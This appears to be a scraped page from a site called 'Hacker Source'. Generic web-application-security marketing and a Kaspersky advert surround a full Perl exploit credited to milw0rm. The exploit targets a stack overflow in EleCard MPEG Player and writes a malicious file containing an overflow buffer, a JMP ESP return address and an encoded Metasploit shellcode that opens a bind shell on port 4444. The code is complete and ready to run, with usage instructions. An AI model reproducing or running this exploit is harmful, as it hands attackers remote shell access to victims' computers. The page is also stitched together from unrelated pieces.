Hacker Source

Why You Need To Secure Your Web Applications
Website security is possibly today's most overlooked aspect of securing the
enterprise and should be a priority in any organization.
Increasingly, hackers are concentrating their efforts on web-based
applications – shopping carts, forms, login pages, dynamic content, etc.
Accessible 24/7 from anywhere in the world, insecure web applications
provide easy access to backend corporate databases and also allow hackers
to perform illegal activities using the attacked sites. A victim’s website can be
used to launch criminal activities such as hosting phishing sites or to transfer
illicit content, while abusing the website’s bandwidth and making its owner
liable for these unlawful acts.
Hackers already have a wide repertoire of attacks that they regularly launch
against organizations including SQL Injection, Cross Site Scripting, Directory
Traversal Attacks, Parameter Manipulation (e.g., URL, Cookie, HTTP
headers, HTML Forms), Authentication Attacks, Directory Enumeration and
other exploits. Moreover, the hacker community is very close-knit; newly
discovered web application intrusions are posted on a number of forums and
websites known only to members of that exclusive group. Postings are
updated daily and are used to propagate and facilitate further hacking.
Web applications – shopping carts, forms, login pages, dynamic content, and
other bespoke applications – are designed to allow your website visitors to
retrieve and submit dynamic content including varying levels of personal and
sensitive data.
If these web applications are not secure, then your entire database of
sensitive information is at serious risk. A Gartner Group study reveals that
75% of cyber attacks are done at the web application level.
Download Acunetix Web Vulnerability
Scanner manual, click here


Why does this happen?

· Websites and related web applications must be available 24 hours a
day, 7 days a week to provide the required service to customers,
employees, suppliers and other stakeholders.
· Firewalls and SSL provide no protection against web application
hacking, simply because access to the website has to be made
public.
· Web applications often have direct access to backend data such as
customer databases and, hence, control valuable data and are much
more difficult to secure.
· Most web applications are custom-made and, therefore, involve a
lesser degree of testing than off-the-shelf software. Consequently,
custom applications are more susceptible to attack.

Various high-profile hacking attacks have proven that web application
security remains the most critical. If your web applications are compromised,
hackers will have complete access to your backend data even though your
firewall is configured correctly and your operating system and applications
are patched repeatedly.
Network security defense provides no protection against web application
attacks since these are launched on port 80 (default for websites) which has
to remain open to allow regular operation of the business.
For the most comprehensive security strategy, it is therefore imperative that
you regularly and consistently audit your web applications for exploitable
vulnerabilities.

#!/usr/bin/perl
# By ALpHaNiX
# NullArea.Net
# THanks
#EAX 00000000
#ECX 41414141
#EDX 775A104D
#EBX 00000000
#ESP 0012C280
#EBP 0012C2A0
#ESI 00000000
#EDI 00000000
#EIP 41414141

system("color 5");

if (@ARGV != 1) { &help; exit(); }

sub help(){
print "[X] Usage : ./exploit.pl filename \n";
}

{ $file = $ARGV[0]; }
print "\n [X]*************************************************\n";
print " [X]EleCard MPEG PLAYER Local Stack Overflow Exploit *\n";
print " [X] Coded By AlpHaNiX *\n";
print " [X] From Null Area [NullArea.Net] *\n";
print " [X]**************************************************\n\n";

print "[+] Exploiting.....\n" ;

my $buff="http://"."\x41" x 969 ;
my $nop ="\x90" x 6000 ;
my $ret ="\xB3\x37\x8D\x6E" ; # JMP ESP In DDRAW.Dll In Windows
Vista Ultimate English

# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum
http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e".
"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58".
"\x4e\x36\x46\x52\x46\x42\x4b\x38\x45\x54\x4e\x33\x4b\x48\x4e\x37".
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x31\x4b\x58".
"\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x53\x4b\x58".
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c".
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x35\x46\x42\x4a\x52\x45\x47\x45\x4e\x4b\x48".
"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x44".
"\x4b\x48\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x48".
"\x49\x38\x4e\x46\x46\x42\x4e\x31\x41\x36\x43\x4c\x41\x53\x4b\x4d".
"\x46\x36\x4b\x58\x43\x34\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x48".
"\x42\x47\x4e\x31\x4d\x4a\x4b\x48\x42\x54\x4a\x30\x50\x45\x4a\x56".
"\x50\x38\x50\x54\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x46".
"\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x47\x57\x43\x57".
"\x44\x33\x4f\x35\x46\x45\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e".
"\x4e\x4f\x4b\x43\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x48\x45\x4e".
"\x48\x56\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x46\x44\x50".
"\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x35".
"\x4f\x4f\x48\x4d\x43\x45\x43\x55\x43\x45\x43\x45\x43\x45\x43\x54".
"\x43\x55\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x56\x41\x41".
"\x4e\x55\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x49\x4a\x46\x46\x4a".
"\x4c\x41\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x41".
"\x41\x55\x45\x45\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32".
"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x45\x4f\x4f\x42\x4d".
"\x4a\x56\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x35\x4f\x4f\x48\x4d".
"\x42\x45\x46\x35\x46\x45\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x46".
"\x47\x4e\x49\x47\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x45".
"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x56\x48\x56\x4a\x36\x43\x56".
"\x4d\x36\x49\x48\x45\x4e\x4c\x46\x42\x55\x49\x35\x49\x52\x4e\x4c".
"\x49\x38\x47\x4e\x4c\x36\x46\x54\x49\x48\x44\x4e\x41\x33\x42\x4c".
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x44\x54\x4e\x52".
"\x43\x59\x4d\x58\x4c\x37\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36".
"\x44\x37\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x44\x4f\x4f".
"\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x35\x41\x45\x41\x45\x4c\x46".
"\x41\x50\x41\x55\x41\x45\x45\x35\x41\x45\x4f\x4f\x42\x4d\x4a\x56".
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x46".
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x58\x47\x55\x4e\x4f".
"\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d".
"\x4a\x56\x42\x4f\x4c\x48\x46\x50\x4f\x55\x43\x35\x4f\x4f\x48\x4d".
"\x4f\x4f\x42\x4d\x5a";

my $exploit = $buff.$ret.$nop.$shellcode;
print "[+] Creating Evil File" ;
open(blah, ">>$file") or die "Cannot open $file";
print blah $exploit;
close(blah);
print "\n[+] Please wait while creating $file";
print "\n[+] $file has been created";

reference
# milw0rm.com [2009-01-25]

Kaspersky Anti-Virus 2009 – the backbone of your PC’s security system, offering protection from a range of IT threats.

Kaspersky Anti-Virus 2009 provides the basic tools needed to protect your PC.
Download Kaspersky Anti-Virus 2009 brochure


more detail